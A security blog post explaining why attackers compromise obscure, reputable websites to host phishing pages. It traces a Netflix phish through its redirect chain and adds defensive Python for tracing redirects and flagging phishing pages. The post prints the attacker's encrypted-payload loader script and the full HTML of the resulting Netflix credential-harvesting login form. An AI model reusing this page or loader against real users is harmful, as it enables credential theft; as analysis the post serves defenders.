The One Valuable Thing All Websites Have: Reputation (and Why It Is So Attractive to Hackers)

Here’s something I hear quite a bit when talking about security things:

Our site isn’t a target, it doesn’t have anything valuable on it

This is usually the retort that comes back in defence of some pretty shady practices and in the mind of the defendant, it’s a perfectly reasonable position. They don’t collect any credentials, they don’t have any payment info and in many cases, the site is simply a static representation of content that rarely changes. So what upside is there for an attacker?

Reputation. More specifically, a non-negative reputation because that’s a valuable thing to attackers wanting to mount a phishing campaign. This happens on an alarmingly regular basis and there was a perfect illustration of precisely this when it was discovered that spammers were hosting files on Equifax’s website (every time we thought it couldn’t get any worse…). This subheading within the piece describes precisely what the attraction is:

Spammers Crave Legitimate Domains

I’ll come back to illustrating the value proposition of this a little later on but for now, I want to share a collection of examples I’ve been saving over the last few months. What follows are all phishing emails which made their way through Microsoft’s Outlook.com filters and landed in my inbox. For example, this one suggesting that I needed to upgrade my account:

Microsoft Phish 1

Looks legit, nice work on the “Microsof” spelling too guys! Ok, it actually looks terrible but the phishing page it then links to is pretty convincing:

All Things Mechanical (Phish)

Here’s the real point of this post though: note the domain in the image above, then look at the actual legitimate website it sits within:

All Things Mechanical

It’s a normal, garden variety website. Pretty rudimentary, running on WordPress and very possibly using any number of plugins which have had serious security risks in the past. It’s the sort of site people think doesn’t pose any upside to an attacker, yet here we are.

Another phish for Microsoft credentials which again, made it directly into my inbox was this one:

Microsoft Phish 2

It displays many of the hallmarks of a phishing attack including establishing a sense of urgency, providing a call to action and attempting to create an air of authenticity. The text “This message is from a trusted sender” you see in the header is the name of the recipient and that same text in the body of the email is nothing more than stylised HTML.

It links through to a similarly convincing phishing page:

Daffodil Excursion Phish

This page happily loaded through my ISP and through Chrome’s anti-phishing protection because the site was yet to be flagged as malicious. Once I stripped off the path, here’s what was on the site:

Daffodil Excursion

Nobody ever suspects daffodils! Chrome certainly didn’t, but if you try going to that site now, you’ll have a very different experience. Now I doubt the Daffodil Excursion website ever had much going on for it traffic-wise, but its value proposition was that it didn’t have a negative reputation!

Another Microsoft phish came through which looked particularly convincing:

Outlook Pfish

And once again, served up a pretty slick looking phishing page:

Bryansford Phish

Which, per the theme of this post, is actually a perfectly legitimate website for a club in Northern Ireland:

Bryansford

For a change of pace from Microsoft phishes, a Netflix one came through:

Netflix Phish

This eventually bounced me over to this page:

Netflix Phishing Site

You’ll see this is on the domain awpaugp250.siterubix.com which is now disabled and would originally have been provisioned as a site built on the SiteRubix service. That’s not the interesting bit here, it’s that the original email click went through to customers.easy.net.gr/xad/:

Easy-net-site

Which did a 302 to 2no.co/3YR3B3, which then did a 301 to awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/, which then did a 302 to the 1931f0840cfa5b56436809863fc47c2d path, which did a 301 to awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/, which was the final destination. It bounced through multiple legitimate hosts before arriving at the destination. But that was just the beginning…
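The hop-by-hop walk described above, as an added example that is not part of the original post: a small Python tracer that refuses to auto-follow redirects, resolves relative Location headers against the URL that issued them, caps the hop count, and records every distinct host touched. The HOPS table is a constructed offline stand-in for the responses the post describes; fetch_live is the same contract against a real server.

```python
import urllib.request
import urllib.error
from urllib.parse import urljoin, urlparse

REDIRECT_CODES = (301, 302, 303, 307, 308)

# Constructed offline stand-in for the responses in the post: URL -> (status, Location).
# The 302 hands back a relative Location, so every hop is resolved against its issuing URL.
BASE = "http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/"
HOPS = {
    "http://customers.easy.net.gr/xad/": (302, "http://2no.co/3YR3B3"),
    "http://2no.co/3YR3B3": (301, BASE),
    BASE: (302, "1931f0840cfa5b56436809863fc47c2d"),
    BASE + "1931f0840cfa5b56436809863fc47c2d": (301, BASE + "1931f0840cfa5b56436809863fc47c2d/"),
}

def fetch_offline(url):
    """Stand-in for a request that does not follow redirects: returns (status, Location)."""
    return HOPS.get(url, (200, None))

def fetch_live(url, timeout=10):
    """Same contract against a real server; never auto-follows, so each hop gets recorded."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # decline to follow; urllib then raises HTTPError for the 3xx
    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(urllib.request.Request(url, method="HEAD"), timeout=timeout) as resp:
            return resp.status, None
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")

def trace_redirects(url, fetch=fetch_offline, max_hops=10):
    """Walk the chain one hop at a time; returns every URL, status and the hosts touched."""
    chain, statuses, seen = [url], [], {url}
    for _ in range(max_hops):
        status, location = fetch(url)
        statuses.append(status)
        if status not in REDIRECT_CODES or not location:
            break
        url = urljoin(url, location)  # handles relative Location values
        if url in seen:
            raise RuntimeError(f"redirect loop at {url}")
        seen.add(url)
        chain.append(url)
    else:
        raise RuntimeError(f"more than {max_hops} hops; gave up at {url}")
    hosts = list(dict.fromkeys(urlparse(u).hostname for u in chain))
    return {"chain": chain, "statuses": statuses, "final": chain[-1], "hosts": hosts}
```

Swap in `fetch=fetch_live` to run the same walk against a live URL from an analysis box.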

That final page then contained the following script which uses this implementation of AES in JavaScript to decrypt an encrypted payload:

<html><head><script src="http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/1931f0840cfa5b56436809863fc47c2d/hok.js"></script><script>
// passphrase the AES key is derived from
var hea2p = '0123456789ABCDEFGHIJKLMNOPQRSTUVXYZabcdefghijklmnopqrstuvxyz';
// the encrypted payload (omitted)
var hea2t = '…';
var output = Aes.Ctr.decrypt(hea2t, hea2p, 256);
document.write(output)</script>

Once decrypted, it’s written out to the page like this:

<title>Netflix</title>
<meta content="" name="keywords">
<meta content="" name="description">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<link type="text/css" rel="stylesheet" href="css/z.css">
<link type="text/css" rel="stylesheet" href="css/a.css">
<link rel="shortcut icon" href="img/nficon2015.ico">
</head>
<body>
<div id="appMountPoint">
<div class="login-wrapper" data-reactid=".n04xqojxfk" data-react-checksum="-290266296">
<div class="nfHeader login-header signupBasicHeader" data-reactid=".n04xqojxfk.0">
<a href="#" class="icon-logoUpdate nfLogo signupBasicHeader" data-reactid=".n04xqojxfk.0.1">
<span class="screen-reader-text" data-reactid=".n04xqojxfk.0.1.0">Netflix</span></a>
</div>
<div class="login-body" data-reactid=".2app2tcssn4.1">
<div class="login-content login-form" data-reactid=".2app2tcssn4.1.0">
<h1 data-reactid=".2app2tcssn4.1.0.0">Sign In</h1>
<form class="login-form" action="r1.php" method="post">
<label class="login-input login-input-email ui-label ui-input-label">
<span class="ui-label-text">Email</span>
<input class="ui-text-input" name="email" type="email" required="" value="" tabindex="0"></label>
<label class="login-input login-input-password ui-label ui-input-label">
<span class="ui-label-text">Password</span>
<input class="ui-text-input" name="password" type="password" required="" tabindex="0"></label>
<div class="login-forgot-password-wrapper"><a href="#" tabindex="3">Forgot your email or password?</a>
</div>
<div class="login-remember-me-wrapper">
<div class="login-remember-me"><label class="login-label-remember-me">
<input type="checkbox" class="login-input-remember-me" value="true" checked="" name="rememberMeCheckbox">
<span>Remember me on this device.</span>
</label>
</div>
</div>
<button class="btn login-button btn-submit btn-small" type="submit" autocomplete="off" tabindex="0">
<spa>Sign In</spa></button>
</form>
<div class="facebookForm regOption">
<button class="btn disabled cta-fb-gdp btn-submit btn-small" type="submit" disabled="" autocomplete="off" tabindex="0">
<span class="icon-facebook"></span>
<span class="fbBtnText">Login with Facebook</span>
</button>
</div>
<div class="login-signup-now">
<br>
<span>New to Netflix? </span>
<a class="" target="_self" href="#">Sign up now</a>
<span>.</span>
</div>
</div>
</div>
<div class="site-footer-wrapper login-footer">
<div class="footer-divider">
</div>
<div class="site-footer">
<p class="footer-top">
<a class="footer-top-a" href="#">Questions? Contact us.</a></p>
<ul class="footer-links structural">
<li class="footer-link-item">
<a class="footer-link" href="#">
<span>Gift Card Terms</span></a>
</li>
<li class="footer-link-item">
<a class="footer-link" href="#">
<span>Terms of Use</span>
</a>
</li>
<li class="footer-link-item">
<a class="footer-link" href="#">
<span>Privacy Statement</span></a>
</li>
</ul>
<div class="lang-selection-container" id="lang-switcher">
<div class="ui-select-wrapper">
<div class="select-arrow medium prefix globe">
<select class="ui-select medium" tabindex="0">
<option value="#">English</option>
</select>
</div>
</div>
</div>
<p class="copy-text">
</p></div>
</div>
</div>
</div>
</body></html>

And there’s your phishing page which all began with that one little hop through a compromised site.
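An added example, not part of the original post, of the kind of static check a mail or proxy filter could run over a fetched page to catch the two-stage pattern above: a decrypt-then-document.write loader, a brand name in the title that does not match the serving host, and a password form posting back to a script on the same host. The LOADER and LOGIN_PAGE samples, the BRANDS list and the .com suffix check are constructed assumptions for illustration; the function returns indicators to combine with reputation data, not a verdict on its own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands the post shows being cloned; the host check is a heuristic, not an allow-list.
BRANDS = ("netflix", "microsoft", "outlook")

class LoginFormScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.title, self.forms, self.has_password, self._in_title = "", [], False, False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.forms.append((a.get("action") or "", (a.get("method") or "get").lower()))
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
    def handle_data(self, data):
        if self._in_title:
            self.title += data

def phishing_indicators(html, page_url):
    """Return the list of static indicators found in one fetched page."""
    findings = []
    host = (urlparse(page_url).hostname or "").lower()
    # Stage one in the post: a bundled AES library decrypts a blob and document.write()s it,
    # so the credential form never appears in the raw HTML that a naive scanner sees.
    if re.search(r"\bAes\.Ctr\.decrypt\s*\(", html) and re.search(r"\bdocument\.write\s*\(", html):
        findings.append("decrypt-then-document.write loader")
    scanner = LoginFormScanner()
    scanner.feed(html)
    brand = next((b for b in BRANDS if b in scanner.title.lower()), None)
    if brand and not host.endswith(brand + ".com"):
        findings.append(f"title impersonates {brand} on host {host}")
    for action, method in scanner.forms:
        if scanner.has_password and method == "post" and not urlparse(action).netloc:
            findings.append(f"password form posts to same-host script {action or '(self)'}")
    return findings

# Constructed samples modelled on the two stages quoted in the post.
LOADER = ('<script src="/nfx/hok.js"></script><script>var hea2p = "0123"; var hea2t = "...";'
          'var output = Aes.Ctr.decrypt(hea2t, hea2p, 256);document.write(output)</script>')
LOGIN_PAGE = ('<html><head><title>Netflix</title></head><body><form class="login-form" action="r1.php" '
              'method="post"><input name="email" type="email"><input name="password" type="password">'
              '<button type="submit">Sign In</button></form></body></html>')
PAGE_URL = "http://awpaugp250.siterubix.com/nfx/5x5wcTcHOGEkq6p2a/aswpt/AynkJ/4ZgadQb/"
```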

Now compare the experience in the images above – namely the fact that I could load the sites without warning – to the following experiences. For example, if I attempt to load the aforementioned daffodil site in Chrome today:

Chrome-Phishing-Protection

This is simply a matter of sufficient time having passed that Google has now classified the site as malicious and placed a rather unmissable warning on it.

Here’s what happens if I try and hit a site that Freedome VPN recognises as malicious:

Freedome Phishing Protection

Turn the VPN off and that same site is flagged by my ISP:

Telstra Phishing Protection

Then there’s Microsoft’s safe links implementation which intervenes when accessing a malicious URL sent by email:

Outlook-Phishing-Protection

So, you see the pattern: domains with non-negative reputations are valuable – that’s the attraction here and it’s just as attractive whether a site is collecting valuable user credentials or posting photos of daffodils! Every site has something valuable it needs to protect and that’s its reputation. Let that go, and the only thing you’re left with is those last 4 screenshots above.

News/content article courtesy of Troy Hunt »
